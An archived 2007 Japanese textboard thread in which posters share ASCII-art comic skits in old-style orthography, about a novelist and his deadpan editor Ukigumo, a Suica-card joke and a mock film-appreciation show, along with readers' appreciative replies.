                                .|  |〜
                                 し`J
                   ――――――――――ヽ――――
                    ですねえ、自分も見習ひたいです

317 :( ´∀`)さん:2007/03/16(金) 12:14:03 ID:Mi7FjwLg0
七/七


人間だら/\してはイカン、と言ふ事だなな
――――――――――v――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


――ヽ――――――――――――――――
先生もどん/\原稿をあげないと浮雲さんに
また( ´_ゝ`)プッされますよ

318 :( ´∀`)さん:2007/03/16(金) 12:28:01 ID:Mi7FjwLg0
七/八



            まづ書齋をご自分で片付けて
            下さっても有難いですよ
           ――――――――――v――――
        | |            |   /ノ人ヽ
    ∧_∧ |―――――――◯゙|   (゚ー゚*)
   (  ´∀`)|   ∧∧.****|  ~旦y,~)
__< ! y   >|    (゚Д゚;)∧ **..|   |,,,,,,||>
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|   |  ノゞ
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ――――ゝ――――――――――
          いや、偶のだら/\も必要でな…

一つ間違へてをりました、申し譯ありません

319 :( ´∀`)さん:2007/03/16(金) 13:02:43 ID:Mi7FjwLg0
日頃私の拙い話を襃めて下さつてゐる皆樣有難う御座います
調子に乘りまして本日二本目の投下です


一/五


ところで、先生は「すいか」なる物をご存知ですか?
―――v――――――――――――――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ―――――――ゝ――――――――――――――
    何を言つてゐる、夏にお前もうちで食つたぢやないか

320 :( ´∀`)さん:2007/03/16(金) 13:03:48 ID:Mi7FjwLg0
二/五


いや/\、野菜のすいかではなく鐵道の切符の
代はりとなるものゝ事です
―――v――――――――――――――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚;)∧ **.|
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ―――――ゝ――――――
        お、おほ。知つてゐるとも

321 :( ´∀`)さん:2007/03/16(金) 13:05:03 ID:Mi7FjwLg0
三/五


それがあれば切符を買はずとも、大東京の鐵道ならば
乘り降りができるのです。
―――v―――――――――――――――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
―――ゝ―――――――――――――――――――――
來る三月十八日からは私鐵もそれに準じた物をだすさうで
首都圈の周りはそれ一つで濟むのださうですよ

322 :( ´∀`)さん:2007/03/16(金) 13:06:41 ID:Mi7FjwLg0
四/五

そんな事になるのか 、後で求めてみやう
――――――――――v――――――
        | |            |
    ∧_∧ |―――――――◯゙|
   (  ´∀`)|   ∧∧.****|
__< ! y   >|    (゚Д゚ )∧ **. |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ. .*.|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ――――ゝ―――――
           しかし大變だな…

323 :( ´∀`)さん:2007/03/16(金) 13:07:54 ID:Mi7FjwLg0
五/五


これからは西瓜を抱へて鐵道に乘らねばならぬとは…


   ∧∧
  (;゚Д゚)
   ⊃y⊃ゞ
   |=.=| ○ 
   し J             .(⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒⌒)
                 ( ( ;´∀`)矢張り良く判つて..)
                 (..      ゐないんですね .)
                 

                                終劇

324 :( ´∀`)さん:2007/03/16(金) 14:34:32 ID:nvPhOEkk0
おゝ。二つ續けて作品が讀めるとは
何だかとても贅澤な氣が致します。

>>323を見て大笑ひしてしまひました。笑
大變面白い作品をありがたうございます。

∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ

325 :( ´∀`)さん:2007/03/16(金) 17:39:42 ID:Mi7FjwLg0
一/九


私の名は浮雲、出版社に勤めてゐる


  ∧_∧
 ( ´_ゝ`)
 (o.{胤} )
 ■| | |
 ( ̄.) ̄)


自惚れてゐる譯ではないが勤務態度は中々の物だと思ふ

326 :( ´∀`)さん:2007/03/16(金) 17:40:37 ID:Mi7FjwLg0
二/九


あつ、浮雲さん。
今度の飮み會の場所なんですが此處で良いですか?
――――――y――――――――――――――――
  ▲_▲
  ( ´∀`)
  (  つゝ□
  )  ) )        ∧_∧
 (__)__)       (´<_`  )
             ( {胤} )
             | | |
             ( ̄.) ̄)
        _____Λ_____
        ふうん、良いんぢやない?

327 :( ´∀`)さん:2007/03/16(金) 17:41:38 ID:Mi7FjwLg0
三/九

ぢやあ、他の人にも意見を聞いてきますね
(浮雲さんはいつもどうでも良さゝうだなあ…)
――――――y―――――――――――――
        ▲_▲
       ( ´∀`)
      ⊂     )つ
       ノ  γヽ
      (__丿\__ノ

              ∧_∧
             (´<_`  )
             ( {胤} )
             | | |
             ( ̄.) ̄)

とても良さゝうな店だつた、洒落てゐたし、料理も美味しさうだ
樂しみになつてきたが口から出るのは何時も通り「ふうん」

328 :( ´∀`)さん:2007/03/16(金) 17:42:26 ID:Mi7FjwLg0
四/九


喜怒哀樂はまづ親から學ぶと言ふが、矢張りそれは本當だらう


                 ∧_∧
                 (´<_` )
                  | i i r ヽ
                ⊂U U O)


私の兩親もかなり落ち着いてゐたし、私もそれが普通だと思つてゐた

329 :( ´∀`)さん:2007/03/16(金) 17:43:42 ID:Mi7FjwLg0
五/九


そして、學校に上がるころには既に出來上がつてゐた


                愛國カルタ買つてもらつたデチ
                皆で遊ぶデチ!
               ――――――y―――――――
                       ∧ ∧ 
                       (*・Д・)  
                     〜(___ノ         ∧∧
                                   (゚ー゚,,)
         ∧ ∧                      〜(___ノ
        (´_ゝ`)          ∧,,∧
        (___ノ         ミ    ミ
                      ミ_____@
                     _Λ________Λ_
                      いゝなあ〜、羨ましい〜


友逹が新しい玩具を持つてきた時、私も他の皆と同じやうその樂しさうな
物に驅け寄りたかつた
しかし、私にはそれがなんとも氣恥づかしくできなかつたのだ

330 :( ´∀`)さん:2007/03/16(金) 17:44:34 ID:Mi7FjwLg0
六/九


        浮雲くんにも見せてあげるデチ
        一緒に遊ぶデチ
       ――――――y―――――――
         ∧ ∧   ∧ ∧ 
        (´_ゝ`)  (・Д・*)
        (___ノ  ⊂___)〜


見せてもらつた總天然色のカルタにどれだけ心躍らせたらう
カルタを捲る度に出てくる色とりどりの繪柄にどれほど笑みが零れたらう
しかし、矢張り出てくるのは「ふうん」「プッ」

331 :( ´∀`)さん:2007/03/16(金) 17:45:30 ID:Mi7FjwLg0
七/九


そんな面白みのない、そして憎らしい子供でも事ある毎に誘ひ
今未だ付き合つてくれてゐる友人には感謝の念が耐へない


      .| 
      A  
     / iゝ
     ヽ ̄/
     | i| 
     /_ヽ
     | ||   
     | ||
     | ||              ∧_∧
     | ||              (´<_`  )
     | ||             ( {胤} )
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ̄ | ̄| ̄ ̄ ̄|  | ̄ ̄ ̄|  | ̄ ̄ ̄|  | ̄ ̄ ̄|
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    
                _,,.. -─────-
            ,. ‐''"´

今擔當してゐる先生の書く話も同じやうに樂しい、續きが氣になつて
仕方のない程だ
もし出來たとして、私がそれを傳へたらどうなることだらう

332 :( ´∀`)さん:2007/03/16(金) 17:46:26 ID:Mi7FjwLg0
八/九


喜怒哀樂の激しい先生の事だ


    ∩ ∧ ∧
    ヽ(;゚Д゚)
      \⊂\
       O-、 )〜
         ∪

飛び上がつて驚くか


         |            .|
         |― ∧ ∧∧ ∧〇|
         |  (゚Д゚≡゚Д゚)  |
         |    ( /つl⌒l⌒l |
         |   (  ノつ)| ̄ ̄ ̄|
      | ̄ ̄ ̄ ̄ ̄ ̄ ̄

すはまさか打ち切りか、などゝ思はれてしまふに違ひない

333 :( ´∀`)さん:2007/03/16(金) 17:52:33 ID:O9nMbYoPO
(・ω・)

334 :( ´∀`)さん:2007/03/16(金) 17:52:46 ID:Mi7FjwLg0
九/九


そんな事は執筆の邪魔であらう
だから私は今日もかう言ふのだ


      .       ....| |            .|
  ∧_∧       .. | |―― ∧∧─―〇|
 ( ´_ゝ`)        | |   (゚Д゚;)   ...|
 (o.{胤} )       . | |    ( /つl⌒l⌒l |
 ■| | |       . | |  (  ノつ)| ̄ ̄ ̄|
 ( ̄.) ̄)      | ̄ ̄ ̄ ̄ ̄ ̄ ̄
 _Λ__
  ふうん         

                        終劇

335 :( ´∀`)さん:2007/03/16(金) 22:18:13 ID:yo0x32OV0
乙で御座います。物凄い勢ひの作品發表ですな。

>>332-333
は、ろぐ詰まりでせうか

336 :( ´∀`)さん:2007/03/16(金) 22:58:23 ID:ERTXjLPM0
おお、まるで往時のころのスレッドの盛況振りを思ひ出すやうな
良い作品の連續でありますなぁ


337 :( ´∀`)さん:2007/03/17(土) 00:26:41 ID:xtaH4fkG0
善き哉、善き哉。

338 :( ´∀`)さん:2007/03/17(土) 19:15:24 ID:TDq3GPEe0
個人認證番號Mi7FjwLg0様、樂しませて戴きました。
ありがたうございました。
>>325-334
浮雲氏の幼少時代をめづらしく興味深く拜見しました。
自分の心の裡を他人に顯わにしない、このやうな方は
巷間、意外と大勢いらつしやるものですよね。
だからといつて彼が物事に對して常に醒めてゐるとは限らないわけで(笑)
浮雲氏を、只の嫌味な薄情者にしなかつたあたりが
作者のあたゝかな御人柄なのであらふと思つたことです(・∀・)

339 :( ´∀`)さん:2007/03/19(月) 19:36:48 ID:trLfDi1U0
  ∧_∧
 ( ´_ゝ`)   保全
 (o.{胤} )
 ■| | |
 ( ̄.) ̄)

340 :( ´∀`)さん:2007/03/20(火) 00:01:34 ID:XzFV7fXv0
一/六


皆さん今日は、大人の趣味のお時間がやつて參りました
―――――――――ヽ――――――――――――――
                      _____
              ∧_∧       | 大人の |
             ( ・∀・ )      |   趣味 |
              (  Y  )       ̄ ̄ ̄ ̄
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
        |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :|
        |           .|/
      ―――――ゝ――――――――
      司會は私、藻羅山でお送りします

341 :( ´∀`)さん:2007/03/20(火) 00:02:23 ID:XzFV7fXv0
二/六


  活動寫眞、身近な物になつてまゐりましたね
 ――――――――ヽ―――――――――――
                      _____
              ∧_∧       | 活動 . |
             ( ・∀・ )      | 寫眞 . |
              (  Y  )       ̄ ̄ ̄ ̄
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
        |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :|
        |           .|/
   ―――――――ゝ―――――――――――
   今週は活動寫眞の樂しみ方をご紹介致します

342 :( ´∀`)さん:2007/03/20(火) 00:03:12 ID:XzFV7fXv0
三/六


見たい物が決まつてゐれば別ですが、さうでない場合はまづ何をやつてゐるのか
調べるところから始めませう

                                            ___
        | |            |   .../               ./ |   茂 |
    ∧_∧ |―――――――◯゙| .../   ∧_∧        ../  .| 劍 .名 |
   (  ´∀`)|   ∧∧.****|./    ( ´∀`)      ../    | .客 .擬 |
__< ! y   >|    (゚Д゚ )∧ * .../     く  y  つ□  /     ..| .傳 .古 |
 _∧_/~~ ~ノJ   ∩ヽ/||⌒!つ./       ノノ川川    /         ̄ ̄ ̄
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄/        (__)_) ./
                ./               /

とは言つても劇場に電話で問ひ合はせ…などはしなくても結構です
知人から、雜誌で、または驛などに貼つてあるポスタア等で十分でせう

343 :( ´∀`)さん:2007/03/20(火) 00:03:58 ID:XzFV7fXv0
四/六


一人で行く、誰かと一緒に行く、どちらの場合に限らず劇場では玉蜀黍のポン菓子を
購入いたしませう
購入する事でこれから活動寫眞を見るといふ氣分が一層高まります

                        _
 /             ∧_∧    |お|
  ま、まさか犯人は… (´Д⊂ヽ    |手|
 \           ⊂    ノ   ...|洗|
                人  Y     |→|
               し (_)      ̄


たゞ、飮み物は個人差がありますが買はない方が良いでせう
良い場面でお手洗ひに…といふ事にもなりかねません


344 :( ´∀`)さん:2007/03/20(火) 00:04:57 ID:XzFV7fXv0
      /|
\_WW/ |WWWWWWWWWWWWW/
≫                   ≪
≫ ・・・・・・・・・・・・・・・・・・・・・・・!≪
≫                   ≪
/MMMMMMMMMMMMMMMMM、\
  
  .(⌒⌒)         
   | |
  ∧ ∧       ∧_∧
  (#゚Д゚)∩    (´∀`# )
  / y .丿    く  y  >
 〜||||||||       ノノ川川
   U U       (__)_)

345 :( ´∀`)さん:2007/03/20(火) 00:06:11 ID:XzFV7fXv0
失敗いたしました…申し譯ありません

五/六


見終はつた後ですがご友人、戀人等とご覽になつた活動寫眞の話をするのは樂しいものですね
しかし、意見の相違が喧嘩になる事も…


      /|
\_WW/ |WWWWWWWWWWWWW/
≫                   ≪
≫ ・・・・・・・・・・・・・・・・・・・・・・・!≪
≫                   ≪
/MMMMMMMMMMMMMMMMM、\
  
  .(⌒⌒)         
   | |
  ∧ ∧       ∧_∧
  (#゚Д゚)∩    (´∀`# )
  / y .丿    く  y  >
 〜||||||||       ノノ川川
   U U       (__)_)




白熱しすぎてカフェーを追ひ出されないやうに注意しませう

346 :( ´∀`)さん:2007/03/20(火) 00:06:50 ID:XzFV7fXv0
六/六


幾つか述べましたが細かい事は考へず見たい樣に見るのが
一番の樂しみ方と考へます。ドンナミカタシタッテ イイヨ
―――――――――ヽ――――――――――――――
                      _____
              ∧_∧       | 大人の |
             ( ・∀・ )      |   趣味 |
              (  Y  )       ̄ ̄ ̄ ̄
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
        |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :|
        |           .|/
  ――――――――ゝ――――――――――
  それでは皆さん、さよなら、さよなら。さよなら

                                  終劇

347 :( ´∀`)さん:2007/03/20(火) 00:12:06 ID:XzFV7fXv0
何時か書かうと書き澑めてをりましたものを何點か
書かせて頂きました
>>332-333は恥かしながら連投規制にかゝつた次第で
ございます
また、自分の人柄を襃めて頂きありがたうございます
嬉しいやら氣恥づかしいやら…
―v―――――――――――――――――――――
∧ ∧
ミ ゚Д゚ミ∧
∩ヽ/||⌒!つ

348 :( ´∀`)さん:2007/03/20(火) 00:51:34 ID:RIL2NgB90
乙で御座います。淀川 長治殿を思い出しました

349 :( ´∀`)さん:2007/03/21(水) 00:53:15 ID:6sXNMGdP0
( ・∀・)ゐ々!

350 :( ´∀`)さん:2007/03/21(水) 20:52:48 ID:2tC2S4ID0
>>347
良ゐ作品を有難うございました。
またのお越しをお待ち申し上げてをります。

351 : ◆1IMMMMMMMM :2007/03/23(金) 06:25:36 ID:K1LZFEG10
善き哉、善き哉。むゝむ。

352 :( ´∀`)さん:2007/03/23(金) 09:10:30 ID:UP8H9zlr0
むゝむ殿、トリは見えどもお姿が見えませんぞ(笑

195 KB
■ このスレッドは過去ログ倉庫に格納されています

>>376 コンビニ 珍走団  >>377 碁会所・ヒカルの碁  >>378 渋谷・稲垣吾郎
>>380 ネットカフェ  >>385 新人のソース・バグ  >>386 合同就職説明会
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)